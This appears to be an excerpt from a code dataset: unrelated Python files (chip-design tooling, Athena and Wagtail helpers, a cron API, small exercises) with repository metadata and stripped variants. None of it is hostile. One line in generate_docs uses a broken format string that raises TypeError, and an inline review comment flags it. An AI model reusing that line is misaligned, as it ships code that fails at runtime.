            draw.line((x + macro_w, y - macro_h, x , y - macro_h), fill=(0,0,0), width=2)
            draw.line((x , y - macro_h, x , y ), fill=(0,0,0), width=2)
        annotated_image_file = os.path.join('pics', 'multi_macro_annotated.png')
        img.save(annotated_image_file)

    def allocate_macros(self):
        """Place every macro inside the user area.

        Returns a dict mapping project id -> (x, y) placement, as produced
        by codegen.allocator.allocate_macros.
        """
        # allocate macros and generate macro.cfg
        allocation = allocate_macros(
            design_size_x = self.width,
            design_size_y = self.height,
            h_edge = 344,
            v_edge = 464,
            macro_snap = self.config['configuration']['macro_snap'],
            projects = self.projects,
            allocation_policy = "legacy",
            openram = self.args.openram
        )
        return allocation

    def create_openlane_config(self):
        """Generate the user_project_wrapper RTL and includes, copy each
        project's RTL plus the local config.tcl into Caravel, and write
        macro.cfg with the chosen macro placements."""
        ### generate user wrapper and include ###
        user_project_wrapper_path = os.path.join(self.config['caravel']['rtl_dir'], "user_project_wrapper.v")
        user_project_includes_path = os.path.join(self.config['caravel']['rtl_dir'], "user_project_includes.v")
        generate_openlane_files(
            self.projects,
            self.interface_definitions,
            user_project_wrapper_path,
            user_project_includes_path,
            None,
            self.args.openram
        )
        ### copy out rtl ###
        for project in self.projects:
            project.copy_project_to_caravel_rtl()
        # copy the local config.tcl file
        src = 'config.tcl'
        dst = os.path.join(self.config['caravel']['root'], 'openlane', 'user_project_wrapper', 'config.tcl')
        logging.info(f"copying {src} to {dst}")
        shutil.copyfile(src, dst)
        allocation = self.allocate_macros()
        macro_inst_file = os.path.join(self.config['caravel']['root'], 'openlane', 'user_project_wrapper', 'macro.cfg')
        with open(macro_inst_file, "w") as f:
            for project in self.projects:
                name = project.title
                alloc = allocation[project.id]
                # TODO fixme! this is also generated in caravel_codegen
                verilog_name = project.module_name + "_" + str(project.id)
                logging.info(f"placing {verilog_name} @ {alloc}")
                f.write(f"{verilog_name} {alloc[0]} {alloc[1]} N\n")
            if self.args.openram:
                # TODO
                f.write(f"openram_1kB 344 464 N\n")
        # Disabled experiment: write met2-4 obstruction rectangles per macro.
        """
        with open("obs.txt", "w") as f:
            for project in self.projects:
                alloc = allocation[project.id]
                macro_w, macro_h = project.get_gds_size()
                f.write("met 4 %.2d %.2d %.2d %.2d,\n" % (alloc[0]+5, alloc[1]+5, alloc[0]+macro_w-5, alloc[1]+macro_h-5))
                f.write("met 3 %.2d %.2d %.2d %.2d,\n" % (alloc[0]+5, alloc[1]+5, alloc[0]+macro_w-5, alloc[1]+macro_h-5))
                f.write("met 2 %.2d %.2d %.2d %.2d,\n" % (alloc[0]+5, alloc[1]+5, alloc[0]+macro_w-5, alloc[1]+macro_h-5))
        """

    """
    * generate an index.md with a section for each project
      - title, author, description, link, picture
    * could also create the info.yaml file for efabless
    * tile all images for final image
    """
    def generate_docs(self):
        """Write index.md with a section (and copied picture) per project."""
        fh = open("index.md", 'w')
        fh.write("# Multi Project Index\n\n")
        fh.write("This index was made with [multi project tools](https://github.com/mattvenn/multi_project_tools)\n\n")
        try_mkdir(self.config["docs"]["pic_dir"], self.args.force_delete)
        for project in self.projects:
            conf = project.config["project"]
            # copy pic
            pic_src = os.path.join(project.directory, conf["picture"])
            pic_dst = os.path.join(self.config["docs"]["pic_dir"], os.path.basename(conf["picture"]))
            shutil.copyfile(pic_src, pic_dst)
            fh.write("## %s\n\n" % conf["title"])
            fh.write("* Author: %s\n" % conf["author"])
            fh.write("* Github: %s\n" % project.repo)
            fh.write("* commit: %s\n" % project.gitsha)
            fh.write("* Description: %s\n\n" % conf["description"])
            # NOTE(review): this format string appears corrupted — "\n\n"
            # takes no arguments, so the % raises TypeError; presumably it
            # was a markdown image link like "![%s](%s)\n\n". Confirm and fix.
            fh.write("\n\n" % (conf["title"], pic_dst))
        logging.info("wrote index.md")
| 9,251 | 0 | 188 |
e1caf081041c836642d517f7b95a24f4ecab4547 | 31 | py | Python | src/ctc/__init__.py | JLuisRojas/reconocimiento-de-voz | 59282ffd6841f22e514a7055cb4d20ef97181b90 | [
"MIT"
] | 1 | 2021-12-03T00:01:09.000Z | 2021-12-03T00:01:09.000Z | src/ctc/__init__.py | JLuisRojas/reconocimiento-de-voz | 59282ffd6841f22e514a7055cb4d20ef97181b90 | [
"MIT"
] | 2 | 2021-04-30T21:11:01.000Z | 2021-08-25T16:00:42.000Z | src/ctc/__init__.py | JLuisRojas/reconocimiento-de-voz | 59282ffd6841f22e514a7055cb4d20ef97181b90 | [
"MIT"
] | null | null | null | from .ctc_loss import get_loss
| 15.5 | 30 | 0.83871 | from .ctc_loss import get_loss
| 0 | 0 | 0 |
3267ba79cb24231f425d7146d4e0f06bc22b758f | 288 | py | Python | wagtail/wagtaildocs/permissions.py | yohanlebret/wagtail | 03c623b467ef8ed3849872273ebad13d48f755ac | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtaildocs/permissions.py | yohanlebret/wagtail | 03c623b467ef8ed3849872273ebad13d48f755ac | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtaildocs/permissions.py | yohanlebret/wagtail | 03c623b467ef8ed3849872273ebad13d48f755ac | [
"BSD-3-Clause"
] | 1 | 2019-03-05T15:37:22.000Z | 2019-03-05T15:37:22.000Z | from wagtail.wagtailcore.permission_policies import OwnershipPermissionPolicy
from wagtail.wagtaildocs.models import Document, get_document_model
permission_policy = OwnershipPermissionPolicy(
get_document_model(),
auth_model=Document,
owner_field_name='uploaded_by_user'
)
| 28.8 | 77 | 0.840278 | from wagtail.wagtailcore.permission_policies import OwnershipPermissionPolicy
from wagtail.wagtaildocs.models import Document, get_document_model
# Policy object consulted by the documents admin: permissions are resolved
# against the base Document model, with ownership tracked through the
# 'uploaded_by_user' field on the (possibly custom) document model —
# presumably so non-privileged editors can manage only their own uploads.
permission_policy = OwnershipPermissionPolicy(
    get_document_model(),
    auth_model=Document,
    owner_field_name='uploaded_by_user'
)
| 0 | 0 | 0 |
a93bb7d8be77c1f82c175aea7aaffbcef63d7b51 | 4,728 | py | Python | zapr/utils/Utils.py | zapr-oss/zapr-athena-client | 3fd953120b7eb64e4325f44a5be8a0b464741ab6 | [
"Apache-2.0"
] | 1 | 2020-11-05T09:25:51.000Z | 2020-11-05T09:25:51.000Z | zapr/utils/Utils.py | zapr-oss/zapr-athena-client | 3fd953120b7eb64e4325f44a5be8a0b464741ab6 | [
"Apache-2.0"
] | 1 | 2021-05-03T11:30:53.000Z | 2021-05-03T11:30:53.000Z | zapr/utils/Utils.py | zapr-oss/zapr-athena-client | 3fd953120b7eb64e4325f44a5be8a0b464741ab6 | [
"Apache-2.0"
] | 2 | 2020-11-05T09:25:54.000Z | 2022-03-18T19:17:33.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys
import os
import re
RUNNING = "RUNNING"
SUCCEEDED = "SUCCEEDED"
QUEUED = "QUEUED"
FAILED = "FAILED"
CANCELLED = "CANCELLED"
S3 = "s3://"
S3A = "s3a://"
| 40.067797 | 116 | 0.626904 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys
import os
import re
RUNNING = "RUNNING"
SUCCEEDED = "SUCCEEDED"
QUEUED = "QUEUED"
FAILED = "FAILED"
CANCELLED = "CANCELLED"
S3 = "s3://"
S3A = "s3a://"
class Utils:
    """Helper routines for the Athena client: query-file loading, macro
    substitution, SQL statement classification and S3/Glue path handling."""

    def __init__(self, logger):
        self.logger = logger

    def get_query_string(self, query_location):
        """Return the full contents of the query file at *query_location*.

        (The first parameter was previously misspelled ``selt``.)
        """
        with open(query_location, "r") as query_file:
            data = query_file.read()
        return data

    def replacing_macro(self, query_string, total_args):
        """Substitute ``${name}`` macros in *query_string*.

        Macro values come from ``sys.argv[4:total_args]``, each argument
        formatted as ``name=value`` (value may itself contain '=').
        """
        for x in range(4, total_args):
            macro_input = sys.argv[x]
            macro, macro_value = macro_input.split('=', 1)
            macro = "${" + macro + "}"
            self.logger.info("Replacing {0} with {1} ".format(macro, macro_value))
            query_string = query_string.replace(macro, macro_value)
        return query_string

    def validate_all_macros(self, query_string):
        """Exit with EX_IOERR if any ``${...}`` macro is still unresolved."""
        matched_string = re.search(r".*\${.*}", query_string)
        if matched_string is not None:
            self.logger.error("Unable to replace the some of the macros value in query {}".format(query_string))
            sys.exit(os.EX_IOERR)

    def split_queries(self, query_string):
        """Split *query_string* on ';' and drop empty statements.

        Returns a lazy ``filter`` object (as before), suitable for iteration.
        """
        queries = query_string.rstrip().split(";")
        queries = filter(None, queries)
        return queries

    def is_drop_table(self, query):
        """Return a regex match object if *query* is a DROP TABLE statement."""
        return re.search(r"^([\s]*)DROP([\s]+)TABLE([\s]+)([.,^.]*)", query, flags=re.IGNORECASE)

    def is_create_table(self, query):
        """Return a regex match object if *query* is a CREATE TABLE statement."""
        return re.search(r"^([\s]*)CREATE([\s]+)TABLE([\s]+)([.,^.]*)", query, flags=re.IGNORECASE)

    def is_insert_into_table(self, query):
        """Return a regex match object if *query* is an INSERT INTO statement."""
        return re.search(r"^([\s]*)INSERT([\s]+)INTO([\s]+)([.,^.]*)", query, flags=re.IGNORECASE)

    def get_table_name_drop_table(self, drop_table_query):
        """Extract the table name from a DROP TABLE statement, or None."""
        self.logger.info("drop table query ....." + drop_table_query)
        # Strip the leading DROP, then the first TABLE keyword; the next
        # whitespace-delimited token is the table name.
        result = re.sub("^DROP", "", drop_table_query.lstrip(), flags=re.IGNORECASE)
        result = re.sub("TABLE", "", result, count=1, flags=re.IGNORECASE)
        if result is not None and len(result.strip()) != 0:
            table_name = result.split()[0]
            return table_name
        return None

    def get_database_table(self, table_name):
        """Split ``db.table`` into ``(db, table)``; exit on malformed input."""
        try:
            db, table = table_name.split('.')
            return db, table
        except ValueError:
            self.logger.error("Unable to read table name and database from the given string {0}".format(table_name))
            sys.exit(os.EX_IOERR)

    def split_s3_path(self, s3_path):
        """Split an ``s3://`` or ``s3a://`` URI into (bucket, key prefix)."""
        path_parts = s3_path.replace(S3, "").replace(S3A, "").split("/")
        s3_bucket = path_parts.pop(0)
        prefix = "/".join(path_parts)
        return s3_bucket, prefix

    def get_table_name_from_insert_query(self, insert_into_query):
        """Extract the target table from an INSERT INTO statement, or None."""
        self.logger.info("insert into query....." + insert_into_query)
        result = re.sub("^INSERT", "", insert_into_query.lstrip(), flags=re.IGNORECASE)
        result = re.sub("INTO", "", result, count=1, flags=re.IGNORECASE)
        if result is not None and len(result.strip()) != 0:
            table_name = result.split()[0]
            return table_name
        return None

    def set_staging_table_property(self,
                                   staging_table_name,
                                   athena_result_location,
                                   table_storage_descriptor,
                                   table_partition_keys):
        """Build Glue table properties for a staging table rooted under the
        Athena result location.

        Mutates *table_storage_descriptor* in place (sets 'Location') and
        returns ``(staging_table_properties, staging_s3_location)``.
        """
        staging_s3_location = athena_result_location + staging_table_name
        table_storage_descriptor['Location'] = staging_s3_location
        staging_table_properties = {'Name': staging_table_name,
                                    'StorageDescriptor': table_storage_descriptor,
                                    'TableType': 'EXTERNAL_TABLE',
                                    'PartitionKeys': table_partition_keys}
        return staging_table_properties, staging_s3_location
| 3,410 | -9 | 374 |
96b383db1e54c60b9a15e346577ac101d4194a10 | 278 | py | Python | 2. Programming Fundamentals With Python (May 2021)/16. Objects and Classes/02_party.py | kzborisov/SoftUni | ccb2b8850adc79bfb2652a45124c3ff11183412e | [
"MIT"
] | 1 | 2021-02-07T07:51:12.000Z | 2021-02-07T07:51:12.000Z | 2. Programming Fundamentals With Python (May 2021)/16. Objects and Classes/02_party.py | kzborisov/softuni | 9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751 | [
"MIT"
] | null | null | null | 2. Programming Fundamentals With Python (May 2021)/16. Objects and Classes/02_party.py | kzborisov/softuni | 9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751 | [
"MIT"
] | null | null | null | # Task 02. Party
person = input()
party = Party()
while not person == "End":
party.people.append(person)
person = input()
print(f"Going: {', '.join(party.people)}")
print(f"Total: {len(party.people)}")
| 15.444444 | 42 | 0.607914 | # Task 02. Party
class Party:
    """Holds the guest list for a party."""

    def __init__(self):
        # Names of everyone who is attending.
        self.people = []
person = input()
party = Party()
while not person == "End":
party.people.append(person)
person = input()
print(f"Going: {', '.join(party.people)}")
print(f"Total: {len(party.people)}")
| 23 | -9 | 49 |
2125751ead55c05b7652d6be63798d48bf0ad2aa | 936 | py | Python | day:40/twosumdesign.py | hawaijar/FireLeetcode | e981e96f6a38a3b08e9b7ef59aec65f6e0e5728a | [
"MIT"
] | 1 | 2020-10-21T12:28:23.000Z | 2020-10-21T12:28:23.000Z | day:40/twosumdesign.py | hawaijar/FireLeetcode | e981e96f6a38a3b08e9b7ef59aec65f6e0e5728a | [
"MIT"
] | null | null | null | day:40/twosumdesign.py | hawaijar/FireLeetcode | e981e96f6a38a3b08e9b7ef59aec65f6e0e5728a | [
"MIT"
] | 1 | 2020-10-21T12:28:24.000Z | 2020-10-21T12:28:24.000Z |
# Your TwoSum object will be instantiated and called as such:
# obj = TwoSum()
# obj.add(number)
# param_2 = obj.find(value)
| 24.631579 | 81 | 0.483974 | class TwoSum:
def __init__(self):
"""
Initialize your data structure here.
"""
self.hash = {}
def add(self, number: int) -> None:
"""
Add the number to an internal data structure..
"""
if(number in self.hash):
self.hash[number] += 1;
else:
self.hash[number] = 1;
def find(self, value: int) -> bool:
"""
Find if there exists any pair of numbers which sum is equal to the value.
"""
for key in self.hash.keys():
diff = value - key;
if(key == diff):
if(self.hash[key] > 1):
return True;
else:
if( diff in self.hash):
return True;
return False;
# Your TwoSum object will be instantiated and called as such:
# obj = TwoSum()
# obj.add(number)
# param_2 = obj.find(value)
| 0 | 778 | 22 |
91147a5dd1a99b381d1c2bafb0c93feb8b412116 | 1,988 | py | Python | file_handler.py | deadcatssociety/sachaller | c997a4bffe6393d8132d3f45f43056417e1aca08 | [
"MIT"
] | null | null | null | file_handler.py | deadcatssociety/sachaller | c997a4bffe6393d8132d3f45f43056417e1aca08 | [
"MIT"
] | null | null | null | file_handler.py | deadcatssociety/sachaller | c997a4bffe6393d8132d3f45f43056417e1aca08 | [
"MIT"
] | null | null | null | import requests
import os
from pathlib import Path
import settings
| 31.0625 | 64 | 0.545272 | import requests
import os
from pathlib import Path
import settings
class FileHandler:
@classmethod
async def get_media(cls, status):
if hasattr(status, "retweeted_status"):
return
if 'media' not in status.entities:
return
url = None
id = status.user.id
user_name = status.user.name
print('START FIND MEDIA')
for media in status.extended_entities['media']:
if "video_info" not in media:
print('PHOTO FILE')
url = media["media_url_https"]
cls.get_file(id, user_name, url)
continue
bitrate = 0
video_info = media["video_info"]
for vid in video_info["variants"]:
print('VIDEO FILE')
if "bitrate" not in vid:
continue
if bitrate <= vid["bitrate"]:
bitrate = vid["bitrate"]
url = vid["url"]
cls.get_file(id, user_name, url)
print('END FIND MEDIA')
@classmethod
def get_file(cls, user_id, user_name, url):
path = f'{settings.BASE_PATH}{user_id}/'
Path(path).mkdir(parents=True, exist_ok=True)
print(f'Start Folder Write: {path}')
try:
print(f'START USERNAME TEXT, USERNAME: {user_name}')
if not os.path.exists(path + user_name):
with open(path + user_name, 'w'): pass
print(f'END USERNAME TEXT, USERNAME: {user_name}')
except:
print(f'ERROR USERNAME TEXT, USERNAME: {user_name}')
pass
media_url = requests.get(url)
file_name = url.split('/')[-1].split('?')[0]
file_path = path + file_name
print(f'START WRITE MEDIA FILE, PATH: {file_path}')
if not os.path.exists(file_path):
open(file_path, 'wb').write(media_url.content)
print(f'END WRITE MEDIA FILE, PATH: {file_path}')
| 1,812 | 84 | 23 |
b4c2d2c978dd4b72ebd7e4239b8f945f29a52b5e | 2,356 | py | Python | pcs/blender_addon/modules/blvcw/crystal_well_headless.py | bisdan/pcs | c77ed4165a2794f28ac72413f2ef0afeadb58297 | [
"MIT"
] | null | null | null | pcs/blender_addon/modules/blvcw/crystal_well_headless.py | bisdan/pcs | c77ed4165a2794f28ac72413f2ef0afeadb58297 | [
"MIT"
] | null | null | null | pcs/blender_addon/modules/blvcw/crystal_well_headless.py | bisdan/pcs | c77ed4165a2794f28ac72413f2ef0afeadb58297 | [
"MIT"
] | null | null | null | """
Crystal Well Headless execution.
Should not be called directly but via headless_execution.py.
"""
import os
import sys
from blvcw.crystal_well_components import CrystalWellSettings, CrystalWellLoader
from blvcw.crystal_well_simulation import CrystalWellSimulator
class __CrystalWellHeadlessExecution:
"""
Performs headless execution with a provided settings file.
The following steps are performed:
1. CrystalWellSettings is loaded with the settings file
2. CrystalWellLoader is generated and imports the crystal object if a custom file is provided
3. CrystalWellSimulator is called with the classes created before and renders like in the add-on
"""
argv = sys.argv
if "--settings_file" not in argv:
print("ERROR: NO SETTINGS FILE PROVIDED")
exit(1)
settings_file = argv[argv.index("--settings_file") + 1]
if settings_file == "":
print("ERROR: NO SETTINGS FILE PROVIDED")
exit(1)
elif not os.path.exists(settings_file): # Path not found
print("ERROR: SETTINGS FILE NOT FOUND")
exit(1)
crystal_well_headless = __CrystalWellHeadlessExecution(settings_file_path=settings_file)
crystal_well_headless.perform_headless_execution()
exit(0)
| 36.8125 | 101 | 0.735144 | """
Crystal Well Headless execution.
Should not be called directly but via headless_execution.py.
"""
import os
import sys
from blvcw.crystal_well_components import CrystalWellSettings, CrystalWellLoader
from blvcw.crystal_well_simulation import CrystalWellSimulator
class __CrystalWellHeadlessExecution:
"""
Performs headless execution with a provided settings file.
The following steps are performed:
1. CrystalWellSettings is loaded with the settings file
2. CrystalWellLoader is generated and imports the crystal object if a custom file is provided
3. CrystalWellSimulator is called with the classes created before and renders like in the add-on
"""
def __init__(self, settings_file_path):
self.settings_file_path = settings_file_path
def perform_headless_execution(self):
crystal_well_settings = CrystalWellSettings()
crystal_well_settings.from_json(self.settings_file_path)
settings_dict = crystal_well_settings.settings_dict
crystal_well_loader = CrystalWellLoader(crystal_object=settings_dict["crystal_object"])
if settings_dict["crystal_object"] == "CUSTOM":
crystal_well_loader.import_obj(settings_dict["crystal_import_path"], clear_material=True)
crystal_well_loader.set_number_crystal_variants_per_render(
number_crystal_variants=settings_dict["number_variants"])
crystal_well_simulator = CrystalWellSimulator(crystal_well_settings=crystal_well_settings,
crystal_well_loader=crystal_well_loader)
counter = 0
for _ in crystal_well_simulator.generate_image():
counter += 1
print("Rendered image number:", counter)
print("Headless execution finished. Created " + str(counter) + " images.")
argv = sys.argv
if "--settings_file" not in argv:
print("ERROR: NO SETTINGS FILE PROVIDED")
exit(1)
settings_file = argv[argv.index("--settings_file") + 1]
if settings_file == "":
print("ERROR: NO SETTINGS FILE PROVIDED")
exit(1)
elif not os.path.exists(settings_file): # Path not found
print("ERROR: SETTINGS FILE NOT FOUND")
exit(1)
crystal_well_headless = __CrystalWellHeadlessExecution(settings_file_path=settings_file)
crystal_well_headless.perform_headless_execution()
exit(0)
| 1,103 | 0 | 54 |
1822dd6009208ea74242aeb5fc8ef76d2cb13eec | 2,422 | py | Python | tests/sparseml/onnx/test_base.py | clementpoiret/sparseml | 8442a6ef8ba11fb02f5e51472dd68b72438539b9 | [
"Apache-2.0"
] | 922 | 2021-02-04T17:51:54.000Z | 2022-03-31T20:49:26.000Z | tests/sparseml/onnx/test_base.py | clementpoiret/sparseml | 8442a6ef8ba11fb02f5e51472dd68b72438539b9 | [
"Apache-2.0"
] | 197 | 2021-02-04T22:17:21.000Z | 2022-03-31T13:58:55.000Z | tests/sparseml/onnx/test_base.py | clementpoiret/sparseml | 8442a6ef8ba11fb02f5e51472dd68b72438539b9 | [
"Apache-2.0"
] | 80 | 2021-02-04T22:20:14.000Z | 2022-03-30T19:36:15.000Z | # Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from sparseml.onnx.base import (
check_onnx_install,
check_onnxruntime_install,
onnx,
onnx_err,
onnxruntime,
onnxruntime_err,
require_onnx,
require_onnxruntime,
)
| 26.326087 | 84 | 0.709744 | # Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from sparseml.onnx.base import (
check_onnx_install,
check_onnxruntime_install,
onnx,
onnx_err,
onnxruntime,
onnxruntime_err,
require_onnx,
require_onnxruntime,
)
def test_onnx():
assert onnx
assert not onnx_err
assert onnxruntime
assert not onnxruntime_err
def test_check_onnx_install():
assert check_onnx_install()
assert not check_onnx_install(min_version="10.0.0", raise_on_error=False)
with pytest.raises(ImportError):
check_onnx_install(min_version="10.0.0")
assert not check_onnx_install(max_version="0.0.1", raise_on_error=False)
with pytest.raises(ImportError):
check_onnx_install(max_version="0.0.1")
def test_check_onnxruntime_install():
assert check_onnxruntime_install()
assert not check_onnxruntime_install(min_version="10.0.0", raise_on_error=False)
with pytest.raises(ImportError):
check_onnxruntime_install(min_version="10.0.0")
assert not check_onnxruntime_install(max_version="0.0.1", raise_on_error=False)
with pytest.raises(ImportError):
check_onnxruntime_install(max_version="0.0.1")
def test_require_onnx():
@require_onnx()
def _func_one(arg1, arg2, arg3):
assert arg1
assert arg2
assert arg3
_func_one(arg1=1, arg2=2, arg3=3)
@require_onnx(min_version="10.0.0")
def _func_two():
pass
with pytest.raises(ImportError):
_func_two()
def test_require_onnxruntime():
@require_onnxruntime()
def _func_one(arg1, arg2, arg3):
assert arg1
assert arg2
assert arg3
_func_one(arg1=1, arg2=2, arg3=3)
@require_onnxruntime(min_version="10.0.0")
def _func_two():
pass
with pytest.raises(ImportError):
_func_two()
| 1,474 | 0 | 115 |
932005b599205728b3a6da781e017f6d07bda72f | 1,809 | py | Python | PaperInfo.py | Astatine-213-Tian/Past-Paper-Crawler | bbf686e9e4ddf61cc9918e61cbc108ee53631c81 | [
"MIT"
] | 2 | 2020-03-18T04:43:57.000Z | 2020-03-22T11:28:01.000Z | PaperInfo.py | Astatine-213-Tian/Past-Paper-Crawler | bbf686e9e4ddf61cc9918e61cbc108ee53631c81 | [
"MIT"
] | 1 | 2020-03-22T13:56:47.000Z | 2020-03-22T14:02:29.000Z | PaperInfo.py | Astatine-213-Tian/Past-Paper-Crawler | bbf686e9e4ddf61cc9918e61cbc108ee53631c81 | [
"MIT"
] | 2 | 2020-03-22T11:50:44.000Z | 2020-04-15T03:44:05.000Z | import re
| 32.303571 | 156 | 0.474848 | import re
class Paper:
def __init__(self, file_name, url):
self.url = url
self.season = "other"
self.season_sort = 9
self.year = "other"
self.type = "other"
self.num = "other"
self.region = "other"
pattern = re.compile(r'\d{4}_(\S)(\d{2})_(\S{2})_*(\w*).') # Pattern for matching the f_in (subject code, season, year, paper number, region number
match = re.match(pattern, file_name)
if match:
result = match.groups()
if result[0] == "m":
self.season = "March"
self.season_sort = 0
elif result[0] == "s":
self.season = "May/June"
self.season_sort = 1
elif result[0] == "w":
self.season = "November"
self.season_sort = 2
self.year = "20" + result[1]
self.type = result[2]
if result[3] and len(result[3]) <= 2:
if len(result[3]) == 1:
self.num = "Paper " + result[3][0]
elif result[3][0] == "0":
self.num = "Paper " + result[3][1]
else:
self.num = "Paper " + result[3][0]
self.region = "Region " + result[3][1]
class Pair: # Class for storing information of ms and qp in pairs
def __init__(self, qp, ms):
self.url = [qp.url, ms.url]
self.year = qp.year
self.season = qp.season
self.num = qp.num
self.region = qp.region if qp.region != "other" else ""
def display(self):
if self.region:
return self.year + " " + self.season + " " + self.num + " " + self.region
else:
return self.year + " " + self.season + " " + self.num
| 1,636 | 36 | 125 |
508751d0f54b5cda30fec2563fbe16b5f633581e | 621 | py | Python | hume/device/procedures/request_library.py | megacorpincorporated/hume | 40093cc7e5e79dbac8386e2e5f7f7a41c7e516e8 | [
"MIT"
] | 2 | 2019-08-18T10:21:43.000Z | 2020-08-23T19:55:17.000Z | hume/device/procedures/request_library.py | megacorpincorporated/hume | 40093cc7e5e79dbac8386e2e5f7f7a41c7e516e8 | [
"MIT"
] | 4 | 2019-08-03T08:58:15.000Z | 2021-06-09T15:49:49.000Z | hume/device/procedures/request_library.py | megacorpincorporated/hume | 40093cc7e5e79dbac8386e2e5f7f7a41c7e516e8 | [
"MIT"
] | null | null | null | import logging
from device.models import Device
from device import connection
from device.connection.gci import GCI
from defs import DeviceRequest
LOGGER = logging.getLogger(__name__)
"""
This module provides functions for sending requests to a device.
"""
def capability(device: Device):
"""
Sends a capability request to the target device.
:param device: device to send the capability request to
"""
content = f"^{DeviceRequest.CAPABILITY}$".encode("utf-8")
connection.send(GCI.Message(content), device)
| 17.25 | 64 | 0.718196 | import logging
from device.models import Device
from device import connection
from device.connection.gci import GCI
from defs import DeviceRequest
LOGGER = logging.getLogger(__name__)
"""
This module provides functions for sending requests to a device.
"""
def capability(device: Device):
"""
Sends a capability request to the target device.
:param device: device to send the capability request to
"""
content = f"^{DeviceRequest.CAPABILITY}$".encode("utf-8")
connection.send(GCI.Message(content), device)
def action():
pass
def heartbeat():
pass
def action_state():
pass
| 12 | 0 | 69 |
b85de9906ccbe05b2899cfe7553dd8c6f67b3e8e | 2,502 | py | Python | plugins/cron/views.py | IronTooch/ajenti | 17b62f6d73a913f97c1219843a2891da2606aea5 | [
"MIT"
] | 1 | 2022-03-02T19:44:31.000Z | 2022-03-02T19:44:31.000Z | plugins/cron/views.py | IronTooch/ajenti | 17b62f6d73a913f97c1219843a2891da2606aea5 | [
"MIT"
] | 1 | 2022-03-05T23:44:40.000Z | 2022-03-05T23:44:40.000Z | plugins/cron/views.py | IronTooch/ajenti | 17b62f6d73a913f97c1219843a2891da2606aea5 | [
"MIT"
] | null | null | null | """
Module to handle an user crontab file.
"""
import os
import pwd
from jadi import component
from aj.api.http import url, HttpPlugin
from aj.api.endpoint import endpoint, EndpointError
from .manager import CronManager
from reconfigure.items.crontab import CrontabNormalTaskData, CrontabSpecialTaskData, CrontabEnvSettingData
@component(HttpPlugin) | 34.75 | 106 | 0.609113 | """
Module to handle an user crontab file.
"""
import os
import pwd
from jadi import component
from aj.api.http import url, HttpPlugin
from aj.api.endpoint import endpoint, EndpointError
from .manager import CronManager
from reconfigure.items.crontab import CrontabNormalTaskData, CrontabSpecialTaskData, CrontabEnvSettingData
@component(HttpPlugin)
class Handler(HttpPlugin):
def __init__(self, context):
self.context = context
@url(r'/api/get_crontab')
@endpoint(api=True)
def handle_api_get_crontab(self, http_context):
"""
Get the cron content through ConManager and store it in a dict.
Method GET.
:param http_context: HttpContext
:type http_context: HttpContext
:return: Cron jobs
:rtype: dict
"""
if http_context.method == 'GET':
user = pwd.getpwuid(os.getuid()).pw_name
crontab = CronManager.get(self.context).load_tab(user)
return crontab.tree.to_dict()
@url(r'/api/save_crontab')
@endpoint(api=True)
def handle_api_save_crontab(self, http_context):
"""
Store cron data from frontend in a cron file through CronManager.
Method POST.
:param http_context: HttpContext
:type http_context: HttpContext
:return: True if successfull
:rtype: bool
"""
if http_context.method == 'POST':
def setTask(obj, values):
for k,v in values.items():
setattr(obj, k, v)
return obj
# Create empty config
user = self.context.identity
crontab = CronManager.get(self.context).load_tab(None)
new_crontab = http_context.json_body()['crontab']
for _type, values_list in new_crontab.items():
for values in values_list:
if _type == 'normal_tasks':
crontab.tree.normal_tasks.append(setTask(CrontabNormalTaskData(), values))
elif _type == 'special_tasks':
crontab.tree.special_tasks.append(setTask(CrontabSpecialTaskData(), values))
elif _type == 'env_settings':
crontab.tree.env_settings.append(setTask(CrontabEnvSettingData(), values))
try:
CronManager.get(self.context).save_tab(user, crontab)
return True
except Exception as e:
raise EndpointError(e) | 151 | 1,977 | 22 |
7becea34e4b418fc2d1816e9fa35757371e71df8 | 2,793 | py | Python | pentest-scripts/python-web-penetration-testing-cookbook/Chapter_06_Code/StegoFull.py | paulveillard/cybersecurity-penetration-testing | a5afff13ec25afd0cf16ef966d35bddb91518af4 | [
"Apache-2.0"
] | 6 | 2021-12-07T21:02:12.000Z | 2022-03-03T12:08:14.000Z | pentest-scripts/python-web-penetration-testing-cookbook/Chapter_06_Code/StegoFull.py | paulveillard/cybersecurity-penetration-testing | a5afff13ec25afd0cf16ef966d35bddb91518af4 | [
"Apache-2.0"
